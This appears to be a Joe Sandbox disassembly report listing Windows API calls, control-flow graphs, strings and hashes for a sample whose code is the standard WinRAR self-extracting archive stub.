                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E4EB
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E501
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E51B
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E55F
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E56D
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E57C
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E5A3
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E5B2
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005CAF8
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005CB20
                                                            • GetTickCount.KERNEL32 ref: 0005CB3E
                                                            • _swprintf.LIBCMT ref: 0005CB52
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0005CB84
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005CBD3
                                                            • _swprintf.LIBCMT ref: 0005CC0A
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0005CC5E
                                                            • GetCommandLineW.KERNEL32 ref: 0005CC74
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00091482,00000400,00000001,00000001), ref: 0005CCCB
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0005CCF3
                                                            • Sleep.KERNEL32(00000064), ref: 0005CD3B
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000421C,00091482,00000400), ref: 0005CD64
                                                            • CloseHandle.KERNEL32(00000000), ref: 0005CD6D
                                                            • _swprintf.LIBCMT ref: 0005CDA0
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CDFF
                                                            • SetDlgItemTextW.USER32(?,00000065,000745F4), ref: 0005CE16
                                                            • GetDlgItem.USER32(?,00000065), ref: 0005CE1F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0005CE2E
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005CE3D
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CEEA
                                                            • _wcslen.LIBCMT ref: 0005CF40
                                                            • _swprintf.LIBCMT ref: 0005CF6A
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005CFB4
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005CFCE
                                                            • GetDlgItem.USER32(?,00000068), ref: 0005CFD7
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005CFED
                                                            • GetDlgItem.USER32(?,00000066), ref: 0005D007
                                                            • SetWindowTextW.USER32(00000000,0009389A), ref: 0005D029
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005D089
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D09C
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C650,00000000,?), ref: 0005D13F
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0005D219
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005D25B
                                                              • Part of subcall function 0005D701: __EH_prolog.LIBCMT ref: 0005D706
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D27F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 581453772-1645151803

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00051B75
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051B87
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BB8
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051E62
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00051E7C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00051E8C
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00074D24,00000000), ref: 00051EAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 00051F02
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051F17
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00074D24,?,00000000,?,00000800), ref: 00051F6B
                                                            • GetFileAttributesW.KERNELBASE(?,?,00074D24,00000800,?,00000000,?,00000800), ref: 00051F95
                                                            • GetFileAttributesW.KERNEL32(?,?,00074DEC,00000800), ref: 00051FD1
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • _swprintf.LIBCMT ref: 00052043
                                                            • _swprintf.LIBCMT ref: 0005208F
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • AllocConsole.KERNEL32 ref: 00052097
                                                            • GetCurrentProcessId.KERNEL32 ref: 000520A1
                                                            • AttachConsole.KERNEL32(00000000), ref: 000520A8
                                                            • _wcslen.LIBCMT ref: 000520BD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000520CE
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 000520D5
                                                            • Sleep.KERNEL32(00002710), ref: 000520E0
                                                            • FreeConsole.KERNEL32 ref: 000520E6
                                                            • ExitProcess.KERNEL32 ref: 000520EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0004ED70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004EDAC
                                                              • Part of subcall function 0004D687: _wcslen.LIBCMT ref: 0004D68F
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 00052EA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CEF8,00000000,?,?), ref: 00052EBE
                                                            • _wcslen.LIBCMT ref: 0004F0E9
                                                            • __fprintf_l.LIBCMT ref: 0004F21C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a

                                                            APIs
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            • GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E4AA
                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C849,000760F0,000A1CF0,000A1CF0,00001000,000830C4,00000000,?), ref: 0005E4D2
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E4DD
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E4EB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E501
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E51B
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E55F
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E56D
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E57C
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E5A3
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E5B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0005E77E
                                                            • ShellExecuteExW.SHELL32(?), ref: 0005E8AE
                                                            • ShowWindow.USER32(?,00000000), ref: 0005E8ED
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0005E929
                                                            • CloseHandle.KERNEL32(?), ref: 0005E94F
                                                            • ShowWindow.USER32(?,00000001), ref: 0005E9B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00066959,00066959,?,?,?,0006BBBC,00000001,00000001,62E85006), ref: 0006B9C5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006BBBC,00000001,00000001,62E85006,?,?,?), ref: 0006BA4B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006BB45
                                                            • __freea.LIBCMT ref: 0006BB52
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • __freea.LIBCMT ref: 0006BB5B
                                                            • __freea.LIBCMT ref: 0006BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:

                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0005BBA7
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005BBDE
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005BBCE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: @UJu$EDIT

                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00048223,?,00000005,?,00000011), ref: 0004AB9F
                                                            • GetLastError.KERNEL32(?,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABAC
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00048223,?,00000005,?), ref: 0004ABE2
                                                            • GetLastError.KERNEL32(?,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABEA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC39
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:

                                                            Control-flow Graph

                                                            control_flow_graph 895 5c5f8-5c611 PeekMessageW 896 5c613-5c627 GetMessageW 895->896 897 5c64c-5c64e 895->897 898 5c629-5c636 IsDialogMessageW 896->898 899 5c638-5c646 TranslateMessage DispatchMessageW 896->899 898->897 898->899 899->897
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                            • IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                            • TranslateMessage.USER32(?), ref: 0005C63C
                                                            • DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 582ad293a2e0701d8aa9f85a1bc32e93f124f05347fe641729f2d08c6f114b0d
                                                            • Instruction ID: 53873f5be34576eb14ab40a640afb443b4b032d0794882e8c795213d8e7b93b0
                                                            • Opcode Fuzzy Hash: 582ad293a2e0701d8aa9f85a1bc32e93f124f05347fe641729f2d08c6f114b0d
                                                            • Instruction Fuzzy Hash: 1DF0A972A01659AAAB209BE59C8CDDB7FBCFF066927004415B905D2010E668D509C7E0

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • OleInitialize.OLE32(00000000), ref: 0005BD04
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD3B
                                                            • SHGetMalloc.SHELL32(0008A460), ref: 0005BD45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: 8ccd1ae00a58efb11a754b9ef4d8f5926a1c21fa586441d6d41ef26c090ff284
                                                            • Instruction ID: 59081b8e6e042cf71a5cf92aa1d26a95eddcc9c69125ec0641dcb9a757f89b68
                                                            • Opcode Fuzzy Hash: 8ccd1ae00a58efb11a754b9ef4d8f5926a1c21fa586441d6d41ef26c090ff284
                                                            • Instruction Fuzzy Hash: 9AF04FB1D00509ABDB10AFA9CC499EFFBFCFF85301F00401AE914A2201D7B85605CBA1

                                                            Control-flow Graph

                                                            control_flow_graph 904 64bf2-64c07 LoadLibraryExW 905 64c3b-64c3c 904->905 906 64c09-64c12 GetLastError 904->906 907 64c14-64c28 call 672b8 906->907 908 64c39 906->908 907->908 911 64c2a-64c38 LoadLibraryExW 907->911 908->905
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00064BA3,00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx), ref: 00064BFF
                                                            • GetLastError.KERNEL32(?,00064BA3,00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064AFD), ref: 00064C09
                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00063A43), ref: 00064C31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID: api-ms-
                                                            • API String ID: 3177248105-2084034818
                                                            • Opcode ID: fd7916e4b1190a59388a8f060d3855206bd579ee16d2a0124a9ea860f0801fc8
                                                            • Instruction ID: b92a2d74e3e5b16f2ac82e33353127679e419ea2ac4c82b88ebb6b5bfd720d06
                                                            • Opcode Fuzzy Hash: fd7916e4b1190a59388a8f060d3855206bd579ee16d2a0124a9ea860f0801fc8
                                                            • Instruction Fuzzy Hash: C7E04830684209F7EF511F60EC06B593F95AB10B55F104020F90CB81F1DB6AD99195D4

                                                            Control-flow Graph

                                                            control_flow_graph 912 4a9c5-4a9d1 913 4a9d3-4a9db GetStdHandle 912->913 914 4a9de-4a9f5 ReadFile 912->914 913->914 915 4a9f7-4aa00 call 4aafc 914->915 916 4aa51 914->916 920 4aa02-4aa0a 915->920 921 4aa19-4aa1d 915->921 918 4aa54-4aa57 916->918 920->921 924 4aa0c 920->924 922 4aa2e-4aa32 921->922 923 4aa1f-4aa28 GetLastError 921->923 926 4aa34-4aa3c 922->926 927 4aa4c-4aa4f 922->927 923->922 925 4aa2a-4aa2c 923->925 928 4aa0d-4aa17 call 4a9c5 924->928 925->918 926->927 930 4aa3e-4aa47 GetLastError 926->930 927->918 928->918 930->927 932 4aa49-4aa4a 930->932 932->928
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0004A9D5
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0004A9ED
                                                            • GetLastError.KERNEL32 ref: 0004AA1F
                                                            • GetLastError.KERNEL32 ref: 0004AA3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
                                                            • Instruction ID: 930a8d3ad2dba7d00cc5437ac43e23a81f73341eee32224c5350351b112f9544
                                                            • Opcode Fuzzy Hash: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
                                                            • Instruction Fuzzy Hash: 3111A0B1B80214EBDF709F64DA04A6D37E9BB07320F104636F52A91190C7788DA4DB9B

                                                            Control-flow Graph

                                                            control_flow_graph 933 6bd44-6bd58 934 6bd65-6bd80 LoadLibraryExW 933->934 935 6bd5a-6bd63 933->935 937 6bd82-6bd8b GetLastError 934->937 938 6bda9-6bdaf 934->938 936 6bdbc-6bdbe 935->936 939 6bd8d-6bd98 LoadLibraryExW 937->939 940 6bd9a 937->940 941 6bdb1-6bdb2 FreeLibrary 938->941 942 6bdb8 938->942 943 6bd9c-6bd9e 939->943 940->943 941->942 944 6bdba-6bdbb 942->944 943->938 945 6bda0-6bda7 943->945 944->936 945->944
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0006524D,00000000,00000000,?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue), ref: 0006BD76
                                                            • GetLastError.KERNEL32(?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue,00078A00,FlsSetValue,00000000,00000364,?,0006A437), ref: 0006BD82
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue,00078A00,FlsSetValue,00000000), ref: 0006BD90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
                                                            • Instruction ID: bf319bc982325aafcba2e84e647eec52df75a856999b6905961450ad772e4802
                                                            • Opcode Fuzzy Hash: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
                                                            • Instruction Fuzzy Hash: 26017BB6A013229BD7304B38EC44A9B37D9FF017A17250220F90AEB151EB38DC80C7E0

                                                            Control-flow Graph

                                                            control_flow_graph 946 52317-52320 947 52392-52395 946->947 948 52322-52324 946->948 949 52327-52345 CreateThread 948->949 950 52347-52369 call 476c9 call 47851 call 476c4 949->950 951 5236e-5237d 949->951 950->951 952 5237f-52382 SetThreadPriority 951->952 953 52388-5238e 951->953 952->953 953->949 955 52390-52391 953->955 955->947
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00012450,?,00000000,00000000), ref: 0005233B
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00052382
                                                              • Part of subcall function 000476C9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000476E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: ca8ae3f84e31a4a3d397b1161229568e4f064d500a54d425ebb4fb091ddaae19
                                                            • Instruction ID: e5391028b70138de81cd2509720601b32dddd12e45985ddd017a51b0b0bad4bc
                                                            • Opcode Fuzzy Hash: ca8ae3f84e31a4a3d397b1161229568e4f064d500a54d425ebb4fb091ddaae19
                                                            • Instruction Fuzzy Hash: 0C01F2B13447066FE320AF549C81BA27399FF51712F10022DFB896A0C1CBA4A8458724
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004E77B,00000001,?,?,?,00000000,00056692,?,?,?), ref: 0004B20E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00056692,?,?,?,?,?,00056154,?), ref: 0004B255
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004E77B,00000001,?,?), ref: 0004B281
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
